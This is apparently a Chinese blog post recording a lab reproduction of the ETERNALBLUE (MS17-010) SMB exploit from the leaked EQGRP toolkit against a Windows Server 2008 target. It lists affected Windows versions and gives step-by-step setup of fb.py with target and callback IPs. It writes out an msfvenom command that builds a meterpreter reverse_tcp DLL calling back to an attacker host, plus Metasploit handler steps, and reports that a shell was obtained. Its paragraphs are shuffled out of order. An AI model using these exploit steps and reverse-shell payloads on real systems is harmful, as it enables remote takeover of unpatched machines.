ETERNALBLUE 本地復現記錄
01-24
昨天朋友圈都熱鬧起來了,原因是因為一個名為:ETERNALBLUE(方程式)的「0day」。其實這個已經不是個0day了,因為補分漏洞微軟在三月份的時候已經發布了補丁(e.g. MS17-010)。漏洞影響:2000/xpSp0/1/2/3/2003Sp0/1/2/3、VistaSp0/1/2/2008Sp1/2/xp_x86Sp0/1/2/3xp_x64Sp1/2/2003ServerSp0/1/2/Server2008Sp0/1/2/win7Sp0/1/Server2008R20/1/Win8Sp0/Server2012Sp0利用條件:開啟了445埠即可。下載地址:x0rz/EQGRP_Lost_in_Translation
這裡輸入Yes或者直接回車。到了這步就可以不需要管攻擊機1了,現在轉到攻擊機2,用MSF生成一個惡意dll。命令如下:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.108.131 LPORT=5555 -f dll > /opt/s.dllLHOST:Linux IPLPORT:自定義埠/opts/s.dll:這裡是你的惡意dll路徑及名稱
可以看到已經生成好了,將惡意dll拷貝到攻擊機1上,等會會用到。接下來進入msfconsole。use exploit/multi/handlerset lhost LINUX IPset lport 剛剛的自定義埠exploit完成這些操作後即可返回至攻擊機1進行下一步操作。這裡插入攻擊機1的惡意dll文件。
到了這步之後 MSF會反彈一個shell回來。這裡被重置連接了,是因為SSL的原因,但是已經測的漏洞存在,且反彈成功。出現SSL錯誤的處理方法: msfvenom的請求需要reverse_tcp模塊才能收到。所以需要set payload。具體設置如圖。(64位)32位的則不需要set payload。 僅以此篇文章記錄解決問題的過程。轉載請私信作者。
推薦閱讀:
0×00 本機環境:
1.win7 x86 (32位)攻擊機12.kali 攻擊機23.win server2008 enterprise x64 靶機首先下載python環境(2.6)版本,下載好了之後設置系統變數。接下來需要修改一下fb.py的一些代碼。第一步:將fb.py的26-28行代碼以及72行代碼注釋掉。接下來下載pywin32。下載地址:Python for Windows Extensions
我們需要選擇對應自己系統以及Python版本的,這裡我選擇的是win32-py2.6的。第二步:在windows目錄下建立一個名為listeningposts的文件夾。運行fb.py,以下截圖僅為一些關鍵截圖,需要用戶自行設置的,其他地方直接回車即可。Target IP:這裡填寫靶機IPCallback IP:這裡填寫攻擊機1 IP第三個記得輸入no 。這裡第一次使用請選擇3:Create a New Project,因為我已經使用過了,創建過項目了 所以就不重複創建了,最後一個需要選擇no。推薦閱讀: